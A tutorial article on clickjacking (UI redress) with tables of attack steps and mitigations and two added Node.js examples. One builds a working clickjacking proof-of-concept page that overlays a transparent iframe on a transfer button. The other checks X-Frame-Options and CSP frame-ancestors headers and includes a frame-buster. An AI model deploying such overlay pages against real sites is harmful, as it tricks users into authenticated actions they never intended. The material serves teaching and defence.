Clickjacking, also known as a UI (User Interface) redress attack, is a technique in which an attacker tricks a user into clicking something other than what they believe they are clicking.
In a clickjacking attack the attacker's page loads the legitimate website or web application inside an invisible or transparent iframe and positions it so that a sensitive control on the target (a "transfer", "delete" or "grant access" button, for example) sits directly under a harmless-looking decoy. The framed page is rendered by the victim's browser, so if the session cookie is sent on the cross-site request the click reaches the real application as an authenticated action, and neither the user nor the server can tell it was not intended.
How Clickjacking Works
| Step | Description |
| --- | --- |
| Creation of a Malicious Page | The attacker builds a page with visible decoy content the victim has a reason to click: a button, a form or a link ("Claim your prize", "Close this ad"). |
| Overlaying the Target Website | The page embeds the legitimate website or web application in an iframe and positions it with CSS so that the control the attacker wants clicked sits exactly where the decoy is. |
| Making Elements Transparent or Invisible | The iframe is made transparent (for example opacity: 0) and layered above the decoy, so the victim sees the decoy but the iframe receives the click. |
| Deceptive User Interaction | The victim clicks what looks like the decoy; the browser delivers the click to the framed target page instead. |
| Performing Unintended Actions | Because the framed page is loaded with the victim's session, the click performs a real, authenticated action in the target application (submitting a form, confirming a transfer, changing a setting) without the victim realizing it. |
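As an added example, not taken from the original article, the following Node.js script builds the attacker's proof-of-concept page described in the steps above. The target URL, the coordinates of the target's sensitive button and the decoy position are hypothetical values; the alignment arithmetic is the part that matters. The page only renders the target if it is served without X-Frame-Options or a CSP frame-ancestors directive, and the click only carries the victim's session if the cookie is still sent on a cross-site iframe request (that is, not SameSite=Lax or Strict).

```javascript
// Added example, not code from the original article. Target URL, button
// geometry and decoy position are hypothetical.

// Compute the iframe offset that puts the target's sensitive control
// (target.x/target.y inside the framed document) exactly under the visible
// decoy button (decoy.x/decoy.y on the attacker's page). Negative values
// simply shift the framed page up/left so the control lands on the decoy.
function alignIframe(target, decoy) {
  return { left: decoy.x - target.x, top: decoy.y - target.y };
}

// Build the attacker's page. The decoy is what the victim sees; the iframe
// is fully transparent (an element with opacity: 0 still receives pointer
// events) and has the higher z-index, so the click lands in the framed
// target, not on the decoy.
function buildClickjackPoc({ targetUrl, target, decoy, frame = { width: 1200, height: 900 } }) {
  const pos = alignIframe(target, decoy);
  const html = `<!doctype html>
<html>
<head>
<meta charset="utf-8">
<title>You won a prize</title>
<style>
  body { margin: 0; position: relative; }
  #decoy {
    position: absolute; left: ${decoy.x}px; top: ${decoy.y}px;
    width: ${target.w}px; height: ${target.h}px;
    z-index: 1;
  }
  #victim {
    position: absolute; left: ${pos.left}px; top: ${pos.top}px;
    width: ${frame.width}px; height: ${frame.height}px;
    border: 0; opacity: 0; z-index: 2;
  }
</style>
</head>
<body>
  <button id="decoy">Claim prize</button>
  <iframe id="victim" src="${targetUrl}"></iframe>
</body>
</html>
`;
  return { html, pos };
}

// Constructed sample: the target's "Confirm transfer" button sits at
// (300, 420) and is 120x40 px; the decoy is placed at (200, 150).
const demo = buildClickjackPoc({
  targetUrl: 'https://target.example/account/transfer',
  target: { x: 300, y: 420, w: 120, h: 40 },
  decoy: { x: 200, y: 150 },
});
console.log('iframe offset:', demo.pos); // { left: -100, top: -270 }
```

Write demo.html to disk and open it in a browser to see the decoy; the pentest version of this page usually also sets opacity to a small non-zero value while aligning, then back to 0 for the final proof.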
Mitigating Clickjacking Attacks
Clickjacking is mitigated mainly on the server side, by telling the browser not to render the page inside a cross-site frame. The following measures are the usual ones, the headers being the real control and client-side script a fallback:
| Measure | Description |
| --- | --- |
| X-Frame-Options Header | A response header telling the browser whether the page may be rendered in a frame. DENY forbids all framing; SAMEORIGIN allows framing only by pages from the same origin. The older ALLOW-FROM value is not honoured by current browsers, so use CSP frame-ancestors when a specific third-party origin must be allowed. |
| Frame-Busting JavaScript | Script in the page that checks whether it is the top-level document (window.self === window.top) and, if not, navigates the top window to itself or keeps the page hidden. It can be bypassed, for example by framing the page with an iframe sandbox attribute that allows scripts but omits allow-top-navigation, so it is defence in depth for clients that ignore the headers, not a substitute for them. |
| Content Security Policy (CSP) | The frame-ancestors directive controls which origins may embed this page (frame-ancestors 'none' or frame-ancestors 'self'), which is the CSP counterpart of X-Frame-Options and takes precedence over it in browsers that support both. Note that frame-src restricts what this page may embed; it does not protect the page from being framed. |
| Referrer Policy | The Referrer-Policy header limits what the browser sends in the Referer header. It does not stop a page from being framed and is not a clickjacking defence on its own; older frame-busting scripts that inspected document.referrer to decide whether framing was allowed were unreliable for exactly this reason. Rely on frame-ancestors or X-Frame-Options instead. |
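Added example, not from the original article, covering both the header-based controls and the frame-busting row above: a Node.js check that decides, from a response's headers, whether a given origin could frame the page, applying the same precedence browsers use (frame-ancestors over X-Frame-Options), plus the legacy frame-buster written against an injected window object so it can be exercised outside a browser. The origins and header values in the sample run are constructed.

```javascript
// Added example, not code from the original article. Origins and header
// values below are constructed for illustration.

// Return the source list of the frame-ancestors directive, or null if the
// policy has no such directive. Directive names are case-insensitive.
function parseFrameAncestors(cspValue) {
  for (const directive of cspValue.split(';')) {
    const tokens = directive.trim().split(/\s+/).filter(Boolean);
    if (tokens.length && tokens[0].toLowerCase() === 'frame-ancestors') {
      return tokens.slice(1).map((t) => t.toLowerCase());
    }
  }
  return null;
}

// Does one frame-ancestors source expression let ancestorOrigin embed a page
// served from pageOrigin? Handles 'none', 'self', '*', scheme-only sources
// and host sources with optional scheme, "*." wildcard and port.
function sourceMatches(src, pageOrigin, ancestorOrigin) {
  if (src === "'none'") return false;
  if (src === "'self'") return ancestorOrigin === pageOrigin;
  if (src === '*') return true;
  const anc = new URL(ancestorOrigin);
  const pageScheme = new URL(pageOrigin).protocol;
  if (/^[a-z][a-z0-9+.-]*:$/.test(src)) return anc.protocol === src;
  const m = /^(?:([a-z][a-z0-9+.-]*):\/\/)?(\*\.)?([^:\/*]+)(?::(\d+|\*))?$/.exec(src);
  if (!m) return false;
  const [, scheme, wildcard, host, port] = m;
  if (scheme) {
    if (anc.protocol !== scheme + ':') return false;
  } else if (anc.protocol !== pageScheme && !(pageScheme === 'http:' && anc.protocol === 'https:')) {
    return false; // no scheme given: ancestor must use the page's scheme (http may upgrade to https)
  }
  if (wildcard ? !anc.hostname.endsWith('.' + host) : anc.hostname !== host) return false;
  const ancPort = anc.port || (anc.protocol === 'https:' ? '443' : anc.protocol === 'http:' ? '80' : '');
  return !port || port === '*' || port === ancPort;
}

// Decide whether ancestorOrigin may embed the page described by `headers`.
// Browsers that support CSP apply frame-ancestors and ignore X-Frame-Options
// when both are present; an empty frame-ancestors list is the same as 'none'.
function canBeFramedBy(headers, pageOrigin, ancestorOrigin) {
  const h = {};
  for (const [name, value] of Object.entries(headers)) h[name.toLowerCase()] = String(value);
  if (h['content-security-policy']) {
    const sources = parseFrameAncestors(h['content-security-policy']);
    if (sources !== null) {
      const allowed = sources.some((s) => sourceMatches(s, pageOrigin, ancestorOrigin));
      return { framable: allowed, decidedBy: 'frame-ancestors' };
    }
  }
  const xfo = (h['x-frame-options'] || '').trim().toUpperCase();
  if (xfo === 'DENY') return { framable: false, decidedBy: 'x-frame-options' };
  if (xfo === 'SAMEORIGIN') return { framable: ancestorOrigin === pageOrigin, decidedBy: 'x-frame-options' };
  // ALLOW-FROM and unrecognised values are ignored by current browsers, so
  // the page renders inside any frame: no protection at all.
  return { framable: true, decidedBy: 'none' };
}

// Legacy frame-busting, written against an injected window object so it can
// run outside a browser; in a real page call frameBust(window) from a script
// placed after <style>body{display:none}</style>. A framing page can defeat
// this with <iframe sandbox="allow-forms allow-scripts"> (no
// allow-top-navigation), which is why it is only defence in depth.
function frameBust(win) {
  if (win.self === win.top) {
    win.document.body.style.display = 'block'; // top-level: reveal the page
    return 'top-level';
  }
  try {
    win.top.location = win.self.location; // try to break out of the frame
  } catch (e) {
    // a cross-origin top window may refuse; the page stays hidden either way
  }
  return 'framed';
}

// Constructed sample run: a permissive X-Frame-Options is overridden by the
// stricter frame-ancestors list, so attacker.example cannot frame the page.
const sampleHeaders = {
  'X-Frame-Options': 'SAMEORIGIN',
  'Content-Security-Policy': "default-src 'self'; frame-ancestors 'self' https://*.partner.example",
};
console.log(canBeFramedBy(sampleHeaders, 'https://target.example', 'https://attacker.example'));
```

To use this against a live target, fetch the page with the victim's cookies (the headers can differ between anonymous and authenticated responses) and pass response.headers to canBeFramedBy; a result of decidedBy: 'none' is the finding.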